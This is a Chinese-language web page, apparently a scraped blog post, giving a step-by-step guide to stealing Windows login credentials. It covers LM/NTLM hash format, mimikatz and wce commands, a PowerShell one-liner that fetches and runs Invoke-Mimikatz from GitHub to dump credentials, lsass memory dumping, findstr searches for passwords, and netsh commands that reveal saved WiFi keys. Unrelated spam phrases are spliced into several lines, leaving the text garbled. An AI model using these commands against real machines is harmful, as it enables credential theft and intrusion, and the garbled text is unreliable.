Windows下登录凭证-密码获取⼯具
Windows的系统密码hash默认情况下⼀般由两部分组成:第⼀部分是LM-hash,第⼆部分是NTLM-hash。Windows系统下hash密码格式⽤户名称:RID:LM-HASH值:NT-HASH值。Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040
⽤户名称为:Administrator
RID为:500
LM-HASH值为:AF01DF70036EBACFAAD3B435B51404EE
NT-HASH值为:44F077E27F6FEF69E7BD834C7242B040
破解⽅式⼀:hash在线破解⽹站:
www.objectif-securite.ch/ophcrack
cmd5兴趣爱好
mimikatz使⽤起来也⾮常简单,提取Windows系统的明⽂密码只需两⾏命令:.
泰迪犬怎么养
privilege::debug
sekurlsa::logonpasswords
破解⽅式三:wce
wce的常⽤参数使⽤说明如下:
参数解释:
梦里花落知多少演员表广州快递公司-l 列出登录的会话和NTLM凭据(默认值)
杭州西湖十大景点-s 修改当前登录会话的NTLM凭据参数:<⽤户名>:<;域名>:<LM哈希>:<NT哈希>
-w 通过摘要式认证缓存⼀个明⽂的密码
破解⽅式四:Powershell+mimikatz
直接利⽤poweshell来调⽤mimikatz抓取系统内的明⽂密码。
powershell "IEX (New-Object Net.WebClient).DownloadString('raw.githubusercontent/ma
ttifestation/PowerSploit/master/Exfiltration/Invoke-M imikatz.ps1'); Invoke-Mimikatz -DumpCreds"
# 将⼯具拷贝到⽬标机器上执⾏如下命令(需要管理员权限,我选择的版本是64位)
< -accepteula - lsass.dmp
# 将⽣成的内存dump⽂件拷贝到mimikatz同⽬录下,双击打开mimikatz执⾏情况如图:
mimikatz # sekurlsa::minidump lsass.dmp
# Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full
findstr /i /s "password" *.config
findstr /i /s "password" *.ini
findstr /i /s "password" *.xml
5、查看电脑wifi密码
# 查看电脑连接过的所有wifi
netsh wlan show profiles
# 查看wifi信号为Aaron的密码
netsh wlan show profiles name="Aaron" key=clear
# CMD⼀键获取所有连接过的WIFI密码
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论